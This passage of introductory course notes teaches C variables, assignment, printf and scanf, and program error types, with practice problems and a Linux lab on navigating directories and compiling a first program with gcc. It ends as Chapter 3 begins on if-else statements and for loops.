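The following C program is an added example (not part of these notes) that makes the point of sections 2.2 and 2.3 concrete: the pattern 01000001 is the character A or the integer 65 depending only on the declared type, and an int really occupies four bytes. The function names are my own; the hex dump also exposes the byte order the CPU actually uses in memory, which on x86 is least-significant byte first and therefore the reverse of the way the notes write a four-byte quantity.

```c
/* Added example (not from the EC310 notes): the same bits, several views.
 * Function names are my own. */
#include <stdio.h>
#include <string.h>

/* Render the 32-bit pattern of an int the way the notes write it,
 * most significant bit first. out must have room for 33 chars. */
void int_to_bits(unsigned int value, char out[33])
{
    for (int i = 0; i < 32; i++)
        out[i] = ((value >> (31 - i)) & 1u) ? '1' : '0';
    out[32] = '\0';
}

/* Parse an 8-character bit string such as "01000001" into a byte value.
 * Returns -1 unless the string is exactly eight '0'/'1' characters. */
int bits_to_byte(const char *bits)
{
    if (strlen(bits) != 8)
        return -1;
    int value = 0;
    for (int i = 0; i < 8; i++) {
        if (bits[i] != '0' && bits[i] != '1')
            return -1;
        value = (value << 1) | (bits[i] - '0');
    }
    return value;
}

/* Hex dump of the n bytes at p in the order they sit in memory.
 * out must have room for 3*n chars. This shows the CPU's real byte order. */
void dump_bytes(const void *p, size_t n, char *out)
{
    const unsigned char *bytes = p;
    for (size_t i = 0; i < n; i++)
        sprintf(out + 3 * i, "%02x%s", (unsigned)bytes[i], i + 1 < n ? " " : "");
}

/* 1 if ints are stored least-significant byte first (little-endian, as on
 * x86), 0 if most-significant byte first, as in the notes' diagram. */
int is_little_endian(void)
{
    unsigned int one = 1;
    unsigned char first;
    memcpy(&first, &one, 1);
    return first == 1;
}

int main(void)
{
    char bits[33];
    int_to_bits(2u, bits);
    printf("the int 2 as %zu bytes of bits: %s\n", sizeof(int), bits);

    /* The notes' ambiguous pattern: only the declared type decides. */
    int b = bits_to_byte("01000001");
    char as_char = (char)b;   /* declared char: the ASCII letter A */
    int  as_int  = b;         /* declared int: the number 65 */
    printf("01000001 declared char: %c   declared int: %d\n", as_char, as_int);

    int x = 65;
    char dump[3 * sizeof(int)];
    dump_bytes(&x, sizeof x, dump);
    printf("int 65 in memory: %s (%s-endian)\n", dump,
           is_little_endian() ? "little" : "big");
    return 0;
}
```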
2.4 Initializing Variables.
All variables always have some value. When we first declare a variable, it will have a value
determined by whatever pattern of ones and zeroes were left in that memory location by the previous program. For our
purposes, this value is a garbage value. To avoid inadvertently using garbage values in a program, it is often advisable to
initialize variables when they are declared. The syntax is:
type variable_name = value ;
Some examples of variable declarations in which the variable is initialized in the declaration are:
int answer = 0;
float weight = 350 ;
Practice Problem 2.1
What data type would be optimal to store the following classes of data?
(a) The number of jellybeans in a jar
(b) The cost of a Snickers bar
(c) The circumference of a lollipop
(d) The individual letters in the word "skittles"
Solution: (a)
(b)
(c)
(d)
Practice Problem 2.2
How many total bytes would be needed to store the following variables?
int tacos, chimichangas;
int nachos = 14;
float pico, de, gallo;
char tortilla, guacamole;
float burritos = 2;
Solution:
2.5. The Assignment Statement.
The direct way to change the value of a variable is by use of the assignment statement.
The assignment statement has the form:
variable = expression;
where the expression on the right can be:
• a literal (i.e., a number such as 5, or a character such as the dollar sign)
• another variable
• a more complicated expression made up of literals, variables and mathematical operators
Some examples of assignment statements are:
int answer, solution;
answer = 10;
solution = answer;        // Now solution equals 10
answer = solution + 10;   // Now answer equals 20
It is important that you understand how an assignment statement works. In an assignment statement, the value of the expression
on the right hand side of the equal sign is first computed, and then the variable on the left hand side of the equal sign is changed
to this value. For example, the statement:
area2 = area2 +10;
would make no sense as an algebraic equation, but in C this statement means: “Make the new value of area2 equal to the old
value of area2 plus ten.” It is important to note that the equals sign is the assignment operator.
A note about char variables. Variables of type char hold single characters such as a, b,…z, A, B,…0, 1,…9, !, #, @. It
is important to note that a character literal is enclosed in single quotes. For example, to declare a variable that will be used
to store marital status (M for married, S for single), we might use:
char marital_status;
marital_status = 'M';
Of course the two previous lines of C code could have been combined into one declaration as
char marital_status = 'M';
2.6. Mixing Types
Generally, you should not store a value of one type in a variable of another type. The biggest problem
occurs when storing a real number in an integer variable. When we store a real number in an integer variable, the portion after
the decimal is truncated (not rounded).
Practice Problem 2.3
Consider the two lines of C code:
int a;
a = 0.9999;
If we were to now print out the value of the variable a, what value would we see?
Solution:
Of course every rule has its exception. Concerning “mixing types,” it is acceptable to assign integers to variables of type
float. The following code would be perfectly fine:
float speed;
speed = 55; // sets speed = 55.0
3. Simple Output
3.1. The printf statement
To output data from our program to the screen (i.e., the monitor) we use a printf statement.
Think of printf as being another name for the monitor. By using printf we can send to the screen:
• values of variables
• arithmetic expressions
• strings of text
printf syntax for character strings. The syntax for printing a string of characters is
printf( " the stuff I want printed " ) ;
Note the quotation marks.
When we want to output a text string, we place the string in quotes. The text string appears exactly as typed, except the quotes
are not printed on the screen. For example, the line of C code
printf( "To be a mid or not to be." );
will output to the monitor: To be a mid or not to be.
3.2. A Note on Spacing.
The computer will not insert spaces before or after the items that are output using printf. A new
printf will start printing to the screen exactly where the last printf left off. We often begin and end strings with blanks
to keep the output from running together.
Practice Problem 2.4
What is the output produced by these two lines of C code:
printf("Go Navy!");
printf("Beat Army!");
Solution:
3.3. Output Escape Sequences.
Since a new printf statement begins where the last printf statement left off, output will
run along one line. To get a new line, we use: "\n" (i.e., \n inside quotes).
The sequence \n is called an escape sequence. The backslash tells the compiler to escape the normal meaning of the next
character, and apply an alternate meaning. In this case, "\n" tells the compiler to advance the cursor to the next line on the
screen. Other escape sequences:
\t     tab
\\     print a backslash
\"     print a double quote symbol
\'     print a single quote symbol
Practice Problem 2.5
What is produced by each of these code snippets?
(a)
printf("Go Navy\n");
printf("Beat Army\n");
(b)
printf("Go Navy\nBeat Army\n");
(c)
printf("Go Navy\tBeat Army\n");
printf("\"Go Navy\nBeat Army\"\n");
printf("A\\B\n");
Solution:
(a)
(b)
(c)
3.4. printf with conversion specifiers
Conversion Specifiers. Next, we discuss the printf syntax for printing numbers and characters within strings. What was
previously termed a character string is now termed a control string, since it will also contain information which controls how
variables will appear.
We must specify the format of the numbers and/or characters with conversion specifiers which describe the format to be used
in printing the corresponding variables. The order of the conversions specifiers is matched to the order of the variables that
appear after the control string. The conversion specifiers are:
%d     for an integer
%f     for a floating point
%c     for a character
%s     for a string
The use of conversion specifiers is best illustrated with an example.
Practice Problem 2.6
Explain what is printed out by the following line of C code:
int number = 3050;
float gpa_low = 3.13 , gpa_high = 3.95;
printf("%d midshipmen have a GPA between %f and %f\n", number, gpa_low, gpa_high);
Solution:
Conversion Specifiers with Simple Strings. We mentioned that we can print a string of characters without using conversion
specifiers. For example, we could print the phrase Go Navy! by using the statement:
printf("Go Navy!");
We could, just as well, have used a conversion specifier to print out this string of characters, as in:
printf( "%s" , "Go Navy!" );
It may cause fewer errors to consistently use format specifiers, even for simple character strings.
Practice Problem 2.7
Determine the error in the complete C program shown below:
#include <stdio.h>
int main()
{
int apples = 42;
printf("There are %c apples in my barrel\n", apples);
}
Solution:
4. Simple input with the scanf statement
4.1 The scanf statement.
The scanf statement is used for inputting data to the program from the keyboard. Think of
scanf as being another name for the keyboard. The scanf statement, like the printf statement, uses a control string
followed by the memory locations of the variables to receive the values typed in at the keyboard.
Best to go to an example! To read an item from the keyboard and place the value into a variable named year_number of
type int, we use:
int year_number;
scanf("%d" , &year_number);
The first part following the parenthesis—%d—is the conversion specifier. The %d indicates that the item that we will type in
at the keyboard is intended to be an integer. As before, we use the conversion specifiers:
%d     for integer
%f     for floating point
%c     for character
%s     for a string
The second part of the scanf statement—&year_number—indicates that the integer typed in at the keyboard should be
placed in the variable named year_number. It is a very common error to omit the & in scanf statements.[5]
You should understand how the scanf statement works. When the computer sees a scanf statement, it stops and waits for
input to be entered from the keyboard. The program does not read the input until the user hits the ENTER key. (This allows
the user to backspace and correct mistakes). Pressing the ENTER key makes the data that we type available for the program.
When we press ENTER, what we typed in is assigned as the variable’s value, and the computer then resumes operation.
Before reading something from the keyboard, it is always a good idea to prompt the user to enter the value using a printf
statement.
Practice Problem 2.8
What is the output produced by this complete C program:
#include<stdio.h>
int main()
{
int year_number;
printf("Enter the year: ") ;
scanf("%d" , &year_number);
printf("\nThe year is %d \n" , year_number);
}
Solution:
You can enter multiple values using a single scanf statement. This is illustrated in the practice problem below.
Practice Problem 2.9
What is the output produced by this complete C program:
#include<stdio.h>
int main()
{
int year, month;
printf("Enter the year and the month (1-12): ") ;
scanf("%d %d" , &year , &month);
printf("\nIt is now %d / %d \n" , month , year);
}
Solution:
Note that values entered via the keyboard must be separated by at least one blank. The first value entered at the keyboard is
stored in year and the second in month. When the computer reads in data with scanf, it ignores spaces, tabs and returns
(other than using the return as a signal from the user that data has been entered).
[5] The ampersand that precedes the variable year_number is the address operator. We’ll talk more about this later. For
now, just remember that with the scanf statement you want to ensure you include an ampersand before each variable name
of type int, float and char.
Practice Problem 2.10
Add one line to the C program shown below (at the point indicated) so that the output shown below is produced when the user
enters 3.5 when prompted.
#include<stdio.h>
int main( )
{
float number;
printf("Enter a number and I will multiply it by 2: ");
scanf( "%f" , &number );
// Enter one line of code here!
printf("Twice the value you entered is: %f \n" , number );
}
Desired output:
Enter a number and I will multiply it by 2: 3.5
Twice the value you entered is: 7.000000
Solution:
Practice Problem 2.11
Match the term on the left with its appropriate description on the right:
printf                    (a) the C programming language
instruction set           (b) the C assignment operator
scanf                     (c) translates assembly language into machine language
machine language          (d) the conversion specifier for an integer value
compiler                  (e) allows the program to receive keyboard input
assembler                 (f) the C escape sequence for a new line
high-level language       (g) instructions expressed as bits
assembly language         (h) program that converts source code to machine language
%d                        (i) all of the simple instructions hard-wired on a CPU
=                         (j) used to display text to the monitor
\n                        (k) English-like words that represent machine code
Solution:
5. Program Errors
A program error is termed a bug. The process of finding and eliminating program errors is called debugging. There are three
different types of program errors.
• Syntax errors. These are violations of the C grammar rules. These errors are caught by the compiler.
• Run-time errors (also called execution-time errors). These are errors that are detected as the program is running.
These errors usually entail an attempt to perform an illegal operation, and usually cause the program to crash.
• Logic errors – these errors are the hardest to find! The program is grammatically correct and executes without
errors, but does not do what we want it to do. As an example, suppose we calculate the average of two float
values a and b and assign the result to a float variable named average by using:
average = a + b /2.0 ;
Since C evaluates division before addition, the statement above will be understood by the C compiler as:
average = a + (b /2.0) ;
which is, of course, not what we intend![6]
[6] The correct line of C code to perform the average would be: average = (a + b) /2.0 ;
To avoid logic errors, you should “trace-through” your program on paper to make sure the logic is correct. When
you trace through the program, you should consider various input possibilities. Statistics show that greater than
50% of a programmer’s time is spent on debugging.
For your reading and viewing pleasure, here are some examples of software errors that led to disasters of one type or another.
These will not be reviewed in class: View/read on your own time if interested.
Runtime error: http://www.wired.com/science/discoveries/news/1998/07/13987
Logic error: http://en.wikipedia.org/wiki/Mars_Climate_Orbiter
Reading
Read Appendix 2, titled "The Linux File System".
Problems
1. Write a complete C program that prompts the user to enter his initials. The program should then provide the following
output message EXACTLY as shown below (where, in this illustration, the user entered his initials as P and V):
Please enter your initials: PV
Thank you PV for using the program.
Turn in a copy of your source code and a screen capture of your program successfully running. For example, my
source code is shown below:
2. Write a complete C program for converting temperature values from degrees Fahrenheit to degrees Celsius. The
program should prompt the user to enter a temperature in units of degrees Fahrenheit. The program outputs the
temperature in degrees Celsius.
If $T_f$ is the temperature in degrees Fahrenheit, the temperature in degrees Celsius, $T_C$, is given by
$T_C = \frac{5}{9}\,(T_f - 32)$
You should declare the two temperatures to be of type float.
Turn in a copy of your source code and a screen capture of your program successfully running. For example, my
source code is shown below:
3. Start at your command prompt for the EC310 VM:
midshipman@EC310:~ $
(a) Determine how many users have accounts on your Linux system. What are their names?
(b) How many items (directories and files) are immediately under the root directory?
4. How many total bytes would be needed to store the following variables?
int time_1, time_2, time_3;
float PRT1 = 9.5, PRT2 = 8.7;
char mid_1, mid_2;
5. Determine the error contained in the program shown below.
#include <stdio.h>
int main()
{
int favoriteNumber = 2017;
printf("My number is %d\n", favorite_Number);
}
6. Consider the Linux file system shown below.
(a) What is the absolute pathname for the directory bob?
(b) What is the absolute pathname for the file lesson5?
(c) If your working directory is joe, what is the relative pathname for the file lesson5?
(d) If your working directory is dane, what is the relative pathname of the root directory?
7. For each of the following questions select the answer that best identifies the type of computing code being described
from the choices
high-level code
assembly code
machine code
honor code
(a) Code resulting from a successful compilation of a C program's source code.
(b) Code used when we write programs in the C programming language.
(c) This code uses English-like mnemonics which correspond to machine instructions.
8.
You and your friend have been tasked to write a C program that prompts the user to enter his initials. The program
should then print to the monitor the user's initials. For example, here is how a run of the program should look:
Your friend has written the program shown below, but her program contains an error. (Note that the numbers shown
on the far left are line numbers shown for convenience… these are not part of the program.)
1 #include <stdio.h>
2 int main( )
3 {
4 char init1, init2;
5 printf("Please enter your initials: ");
6 scanf("%c %c", &init1, &init2);
7 printf("Thank you %c%c for using the program\n",
8 init2, init1);
9 }
(a) Determine the error. Note: Splitting a printf statement across two lines (as shown on lines 7-8) does not cause
any problems.
(b) What type of error is this (syntax, runtime or logical)?
Security Exercise 2
Part 0: Ground Rules
• Do not attempt to physically alter any equipment in the lab, aside from your own laptop.
• Once your instructor has verified that you have completed all portions of the security exercise, you may turn in your completed security exercise answer sheet (the last page, where you place your answers). It is at your instructor's discretion whether you may leave early.
• While each student must be doing the security exercise on his own PC, you are free to consult and confer with friends who are nearby. Learning from your friends is encouraged!
Safety tip:
You must be doing the security exercise during the lab session. You will have 1 point deducted from your final course grade
for each time your instructor catches you surfing the web, checking your email, or doing anything other than the security
exercise. Don’t do it!
Part 1: Starting Point
Start VMware Workstation. Click "Power on this virtual machine", which should be the virtual machine you loaded on the
first day of class.
You should see something similar to this mysterious screen:
So, our plan today is to run C programs in a Linux environment using VMware. To which you are probably saying:
Who am I? Why am I here?
Don’t worry! It’ll be fun!!!
We said that our goal is to “Run C programs in a Linux environment using VMware.” This likely raises three questions in your
mind:
• What is this mysterious thing that you are calling “VMware”? As a related question: Do I have to come to class, or can I attend virtually?
• Linux is not Windows… and therefore I fear it. Why are you making me use this exotic operating system?
• How do I run C programs? And what is for dinner in King Hall today?
We’ll answer each of these questions in turn.
So, first: What is VMware?
VMware allows you to “play” other operating systems on your Windows computer.
It used to be the case (about ten years ago) that if I wanted to have, say, a Windows computer, an Apple computer and
a Linux computer, I would have had to buy three separate computers: a Windows computer, an Apple computer and
a Linux computer.
More recently (about seven years ago), dual-booting became more prevalent. In this case, I could run Windows and
Linux on the same computer, but I had to choose which operating system I wanted to run—i.e., as soon as the computer
was turned on, I would be prompted to make a choice, and then I had to stick with that. If I was running Linux but
then wished to switch to Windows, I would have to restart the computer and then, when prompted, state that I wanted
the computer to run as a Windows machine.
Then, along came VMware.
VMware allows us to “play” another operating system as though it were just another application. Just as I can have a
window open with a PowerPoint application running, and a window open with a Firefox application running, I can—
using VMware—have a window open with the Linux operating system running.
So, shown below is a snapshot of my computer screen (obviously, your background and icons will be far less
interesting). Note that I am using Windows 7 as my operating system, but the VMware window that I have open is
running a Linux operating system. The Linux operating system that is running in that window works the same way
as if I bought a computer and installed Linux as the base operating system on it.
Hopefully you are saying: Wonderful, I can run Linux using VMware. So, we now reach your second question:
Why do we want to run Linux? Why not conduct EC310 just using the Windows environment?
Linux has cornered a whopping 1.5% of the desktop operating systems market share (as of April 2015). Windows
has over 90% of the market share. In fact, more people use the horror known as “Windows Vista” than use Linux.
Really, please, come on, who uses Linux? So, why would we use Linux? I mean, for reasons other than sadism.
First, let’s note that for server operating systems—the operating systems that do the heavy lifting of managing web
servers, managing email servers, and so forth—a different operating system—the UNIX operating system—far
surpasses Windows in market share! Well over half of all servers run a variant of UNIX.
Linux is a flavor of UNIX. But the real attraction of Linux is that it is open source. Anything and everything about
Linux is available to be viewed. There are no trade secrets.
Windows, on the other hand, is a proprietary commercial product. Microsoft only gives us the machine language
code, not the source code. So, we really do not know the inner workings of Windows. How and why Windows
operates the way it does is a trade secret.
So, by using Linux, we can understand precisely what is going on, since the entire operating system is out in the open.
And we want to understand precisely what is going on.
So… shall we write some C programs?
Well… not quite yet. First let's refresh ourselves on how the Linux directory structure is organized.
First, we will usually work within the terminal window. The terminal window is shown below.
You enter commands at the prompt. The prompt in the picture above is what says
midshipman@EC310:~ $
All users of a Linux operating system have an account name (also referred to as a user name or a login name) and a password.
When your Linux account is created, you are also given a home directory where all of your files and folders will reside. Your
home directory has the same name as your account name.
You may be wondering: Hey, I’m right now using Linux in EC310 and I was never asked for an account name and password
while logging on? That is because your textbook author (Jon Erickson) has set up your VMware software to provide Linux
“already open” for you. We have, however, changed your account name to midshipman since that is, after all, your first
name.
Even more specifically, the command line interface (where we enter commands) is called the bash shell. Every time you enter
a command, you are entering the command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is the dollar
sign. Before the prompt, you will see your account name and your computer's name.
(Labels in the picture: your account name (midshipman), your computer's name (EC310), and the prompt ($).)
There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The tilde is an abbreviation
for your home directory. When you log in, you are placed by default in your home directory.
Suppose you wander up to a computer and notice that someone is logged on, and you see
then the user whose account name is joe has logged in but has forgotten to log out. Bad stuff.
If you ever forget who you are, even though your account name is staring you in the face, you can enter:
whoami
as shown below:
Go ahead… Enter whoami (you know you want to ) and confirm that you are indeed the user named midshipman.
In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories (in Windows
terminology, these are referred to as folders), which hold files (or other directories).
A Linux system (like a Windows system) may support multiple users. In such cases, each user is given his own home directory.
When you logon, you are automatically placed in your home directory. When Joe logs on, he is automatically placed in his
home directory. Your home directory is the natural location for any directories or files that you create. You can leave your
home directory and move to other directories. Whatever directory you find yourself in, that directory is termed your working
directory.
A portion of your Linux file system (also called a directory structure) looks like this:
At the very top is the root directory, denoted /. The root directory contains all directories and files.
Every Linux system has a special user named root. The root user is the great-and-all-powerful system administrator of the
Linux system. The root user can access any file on the system, including the files of individual users. The root user can read
the files of all users, can write over any files, and can delete any files. The root user can load any software onto the system
(e.g., programs). The root user owns the system.
The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt, the pound sign (#).
If you walk up to a computer and see this:
that means the root user has logged in and left the computer unattended. That would be bad, since that would mean you could
look at all files on the system (for all users) and add any software you like to the system (including malware).
Listing Files You can list the contents of the working directory by using the ls command. In your home directory, at the
command prompt type: ls
(note this is a lower case L)
Question 1. List the contents of your working directory.
Changing Your Working Directory Right now, your working directory is the same as your home directory: midshipman.
Suppose you want to change your working directory to booksrc (see the directory structure shown above). To do this, type:
cd booksrc
When you change your working directory, the command line will update to indicate your new working directory. You should
now see your prompt as:
midshipman@EC310:~/booksrc $ (note that the working directory shown in the prompt has changed to ~/booksrc)
At any time, you can travel "up" one directory by typing
cd ..
Go ahead and enter this: That is, the two letters cd, followed by a space, followed by two periods (with no space between the
periods). Note that cd stands for change directory. Since you were in the booksrc directory, you should have moved up one
level back to your home directory. In other words, you should see this:
Question 2. Starting at your home directory (where you should presently be), move up one directory and list the
contents of your new working directory.
If you are navigating around the directory structure, and you forget where you are, you can enter the command pwd which
stands for print working directory.
If you find yourself lost in the file system, you can instantly reset your working directory back to your home directory by simply
typing cd by itself (i.e., without the two periods). Go ahead and type
cd
and confirm you are back in your home directory.
Part 2: Your First C Program
Now where were we… Oh yes! The C program!
Before we begin, type the following at the prompt: cd work . That is, enter what is shown in bold below:
midshipman@EC310:~ $ cd work
(The part up to and including the dollar sign is the prompt; cd work is what you enter.)
Your prompt should now be
midshipman@EC310:~/work $
We will enter all of our programs in the work directory.
Question 3. List the current contents of your work directory.
We are going to enter our C program using a simple text editor named nano. Let’s name our first C program
lastname_2_1.c where you use your own last name. So, if my last name is smith, I would name this program
smith_2_1.c.
So, enter the following at the prompt (again, using your own name instead of “smith”):
midshipman@EC310:~/work $ nano smith_2_1.c
(The part up to and including the dollar sign is the prompt; nano smith_2_1.c is what you enter.)
Why did I pick the name smith_2_1.c ? The two stands for Security Exercise 2 (i.e., we are now conducting EC310
Security Exercise 2). The one stands for your first program. So, this is your first program in Security Exercise 2.
You should see the editor opened with the correct file name at the top as shown below.
Note the file name
Now, carefully type the program below into the file smith_2_1.c
#include <stdio.h>
int main( )
{
}
Your screen should look like this:
Now we want to save this file. In nano, to save a file we use Control + o (that is, we press the Control key and the small letter
o key at the same time).
At that point nano will ask you if you want to still save the file under the original name. Just hit enter.
Now, exit from nano by using Control + x. You should be back to the terminal prompt:
You may now be wondering: How do I know the file that I just typed exists? Where is it?
You already know the answer! To see all of your files enter the letters ls at the command prompt. So, at the prompt, type
ls:
midshipman@EC310:~/work $ ls
and you should see:
So, your C file is there!
Now remember, your C program is source code. The CPU does not understand source code—it only speaks in machine
language. So we have to compile the source code into machine language using a compiler.
The compiler we will use is gcc.
So, at the prompt, compile your program by typing in gcc followed by the name of your C program. For me, I will enter:
midshipman@EC310:~/work $ gcc smith_2_1.c
Looking at the resulting screen…it looks like nothing happened. Linux just went right back to the prompt.
Ask yourself… What should have happened? Linux should have created a machine language file. Did it?
Linux automatically names the output of the C compiler as a.out. So…do you have a file named a.out?
Let’s see. Type ls at the prompt and check if you have a file named a.out.
I do! Joy!
Alright…what do we do after we compile our program? We execute it! To execute the program, we simply type a period,
followed by a slash, followed by the name of the executable code (the machine language file) at the prompt and hit enter. So,
we should type
midshipman@EC310:~/work $ ./a.out
and hit enter and… and…and…nothing happened.
Question 4. Why did nothing happen?
Part 3: A C program that does something!
It’s kind of a law of Computer Engineering that your first real program has to be a program that prints the message Hello
World! to the monitor. Since this is the Naval Academy, we will modify this and write a more appropriate program that
prints the message Hello Cruel World! to the monitor.
Here are the steps.
a) Using nano, open your existing file (for me, this file is smith_2_1.c).
b) Modify your source code so that it will print the desired message with a blank line above and a blank line below
the message. You should only need to add a single line of code to the program: a single printf statement.
Remember that to get a new line you use the escape sequence: \n .
c) Compile your program.
d) Run your program.
If all works well, you should see this:
Note the cruel message! And note the blank lines around the cruel message!
When your program works correctly, show it to your instructor or lab tech. Your instructor or lab tech will sign Question 5
on the Security Exercise.
UNIX Tips and Tricks
Are you getting tired of typing in the exact same commands again and again?
As you develop a file, you may have to open it for editing numerous times (by
typing nano smith_2_1.c) , you may have to compile it again and again (by
typing gcc smith_2_1.c), and you may have to execute it again and again
(by typing ./a.out). Engineers often find themselves typing the same
commands again and again and again.
In an effort to make life easier, UNIX (well, actually it’s the bash shell) remembers the recent commands that you
have entered at the command line. You can view the recent commands that you have entered by pressing the up-arrow; each press of the up-arrow moves us back by one earlier command. So, say you want to enter
nano smith_2_1.c
and you know that you have recently entered this command. You can press the up-arrow repeatedly until you find the
command, and then hit enter. UNIX will treat this as though you have typed in the command and pressed enter.
You are urged to try this (since it allows you to avoid a huge amount of repetitive typing). Ask your instructor for
help if, after reading this, you do not understand this feature.
Enabling the mouse within the nano editor. You can make the mouse functional within the nano editor by starting
the editor with the -m option. For example:
nano -m smith_2_1.c
Part 4: The world’s simplest calculator!
We want to write a program that will prompt the user to enter two integers. The program will then return the sum of the two
numbers. An execution of your program should look exactly like the program below, where, in this case, the user entered the
numbers 3 and 4. Your program should provide the correct answer for whatever two integers the user enters.
Shown below is the program, except it is missing three lines of code. Your task is to complete the program. So, start by
entering the program shown below as smith_2_2.c . Your goal is to replace the three comments with C code that makes
the program work as intended.
#include <stdio.h>
int main( )
{
int number1 , number2 , sum ;
printf("\nEnter two integers and I will tell you their sum: ");
// line of code to read in the two values from the keyboard
// line of code to add the two values together
// line of code to print out the sum
}
Demo your working program to your instructor or lab tech. Your instructor or lab tech will sign your Security Exercise for
completing the demo for Question 6.
Question 7. How much total memory is taken up by your variables in the preceding program?
Question 8. When I execute the preceding program, why do I have to run the file a.out? Why can't I just run the file
smith_2_1.c ?
Security Exercise 2 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5: _____________________________
Instructor or Lab Tech Signature
Question 6: _____________________________
Instructor or Lab Tech Signature
Question 7:
Question 8:
Chapter 3: Assembly Language and Memory
Objectives:
(a) Explain the operations of several basic assembly language commands, including mov, cmp, jmp, jle, jne and inc.
(b) Demonstrate the ability to debug a running C program in memory, to include the inspection of processor registers and
arbitrary memory locations
(c) Demonstrate the ability to analyze C programs that employ if-else statements and for loops.
(d) Apply Boolean logic to evaluate how selection structures can alter program flow.
(e) Analyze existing programs for flaws with the gdb debugger.
1. A Little More C: The if-else selection structure and the for repetition structure
The order in which program statements are executed is called flow of control. All of the programs that we have seen so far
consist of statements executed in order, one after the other. As we will see, we often need to vary the order in which statements
are executed.
1.1 The if-else statement Consider the following example
Write a program that accepts the user’s GPA as an input and prints “You’re on the Dean's List!” if her GPA is greater
than or equal to 3.5, and prints, “Keep trying!” if her GPA is less than 3.5.
Right now, we can’t solve this simple problem because we have no way for a program to choose between alternatives. To
solve this problem, C provides an instruction that allows the user to select which statements to execute based on the value of
one or more variables. This useful C instruction is the if-else statement.
The program that solves the problem above is shown below:
(Callouts on the listing: if the value of the variable gpa is greater than or equal to 3.5, all of the statements between the braces following the if will execute and the statements within the braces after the else are skipped; if the value of gpa is less than 3.5, all of the statements between the braces following the else will execute and the statements within the braces following the if are skipped.)
#include<stdio.h>
int main( )
{
float gpa;
printf( "Enter GPA: ");
scanf( "%f" , &gpa ) ;
if ( gpa >= 3.5 )
{
printf("\nYou’re on the Deans List!\n");
}
else
{
printf( "\nKeep trying!\n" );
}
printf( "\nGo Navy!\n\n" );
}
In the code above—immediately after the word if—we have a Boolean expression in parenthesis:
gpa >= 3.5.
A Boolean expression is an expression that always evaluates to either true or false. If this particular Boolean expression is
true (i.e., if the value of the variable gpa is indeed greater than or equal to 3.5), the statements contained within the first set
of braces (following the word if) will be executed, and the statements within the second set of braces (following the word
else) will be skipped.
If, on the other hand, the Boolean expression is false, the statements within the braces following the word else will execute
(and the statements within the braces following the word if will be skipped).
Shown below are two separate executions of the program shown above. Note that in both cases, the printf statement
printf( "\nGo Navy!\n\n" ); is executed.
The simplest Boolean expression compares numbers and/or variables using a comparison operator. You should be familiar
with the usual operators: >, >=, < and <=, == and !=. The table below summarizes these comparison operators.
Comparison Operator    Meaning
>                      Greater than
>=                     Greater than or equal
<                      Less than
<=                     Less than or equal
==                     Equal
!=                     Not equal
In C, we can check for equality by using two equals signs in a row, with no space between them. So, for example, a Boolean
expression that can be used to check if a float variable named hours is equal to forty would be
hours == 40
In C, we can check for inequality by using an exclamation sign followed by an equals sign. So, for example, a Boolean
expression that can be used to check if a char variable named grade is not equal to F would be
grade != 'F'
There are two modifications we can make to the if-else statement. The first modification is that we don’t have to have the
else part. In this case, the program performs the statements in braces following the word if when the Boolean expression
is true, and skips these statements if the Boolean expression is false. Consider our earlier program without the else portion,
and the corresponding screen captures:
#include<stdio.h>
int main( )
{
float gpa;
printf( "Enter GPA: ");
scanf( "%f" , &gpa ) ;
if ( gpa >= 3.5 )
{
printf("\nYou’re on the Deans List!\n");
}
printf( "\nGo Navy!\n\n" );
}
The second modification is that if there is only a single statement within the curly braces of the if or the else, then the braces
are optional. The programs shown above will work just as well without the braces surrounding the printf statements.
1.2. The for statement Many programs include some actions that must be performed again and again, some number of
times—that is, we may want to repeat sections of our program again and again. A part of a program that repeats a number of
statements is called a loop. Let's jump right into examining a program that uses a for loop, along with its corresponding
output.
#include<stdio.h>
int main()
{
int count;
for( count = 1 ; count <= 5 ; count = count + 1)
{
printf( "%d\n" , count );
}
}
Any statements within curly braces following the word for comprise the body of the loop; these statements will be executed
each time the loop iterates. In this example, there is only one statement within the body of the for loop:
printf( "%d\n" , count );
and so each time the loop iterates, the program will print out the value of the variable count, followed by a new line. The
question remains: What controls the number of times the loop will iterate?
In this example, the variable count will be used to determine the number of times the loop executes. When we enter the for
loop, the loop control variable (i.e., count) is initialized:
for( count = 1 ; count <= 5 ; count = count + 1)
This tells how the loop control variable is initialized.
This initialization occurs only once.
Next, the program checks to see if the Boolean expression is true:
for( count = 1 ; count <= 5 ; count = count + 1)
The loop control variable is compared to 5. This Boolean
expression is used to determine if the loop should execute.
Since the variable count (at this point in time) is equal to 1, the Boolean expression is true and we execute the statement in
the body of the loop. The output we see on the screen is:
When we finish executing the body of the loop, we update the loop control variable:
for( count = 1 ; count <= 5 ; count = count + 1 )
The loop control variable is updated.
The loop control variable count is now equal to 2. We once again return to the Boolean expression:
for( count = 1 ; count <= 5 ; count = count + 1)
and see that it is true (2 is indeed less than or equal to 5) and we again execute the body of the loop.
The screen output is now:
When we finish executing the body of the loop, we update the loop control variable:
for( count = 1 ; count <= 5 ; count = count + 1 )
and count becomes 3. We then return to the Boolean expression, note that it is true, execute the loop, and update the loop
control variable to 4. The loop executes again, and count is then updated to 5. The loop executes again (since 5 is less than
or equal to 5) and count is then updated to 6. When count is updated to 6 the Boolean expression becomes false and we
exit the loop. The final screen output is:
Note that in the for loop the initialization is done only once, and we then "bounce back and forth" between the Boolean
expression and the update of the loop control variable.
for( count = 1 ; count <= 5 ; count = count + 1 )
The first part (count = 1) is done when we first enter the loop and never again repeated; we bounce back and forth between the other two parts (the Boolean expression and the update).
A flowchart for the for loop: initialization of the loop’s control variable (initialization occurs only once!) → Boolean expression → if True, the body of the loop, then the update of the loop’s control variable (the update happens after the body of the loop is performed!), and back to the Boolean expression; if False, the loop is exited.
Practice Problem 3.1
For each of the for loops shown below, state how many times the loop will iterate.
a) for( i = 1 ; i <= 100 ; i = i + 1 )
b) for( i = 3 ; i > 1 ; i = i - 1 )
c) for( i = 7 ; i <= 21 ; i = i + 7 )
Solution:
(a)
(b)
(c)
Practice Problem 3.2
Examine the following C program and describe the expected output.
#include<stdio.h>
int main( )
{
int count;
for( count = 1 ; count <= 2 ; count = count + 1 )
{
if( count > 1 )
printf( "Cyber\n" );
else
printf( "Fun\n" );
}
}
Solution:
2. Machine and Assembly Language To understand the damage that an adversary can inflict on your host computer, you
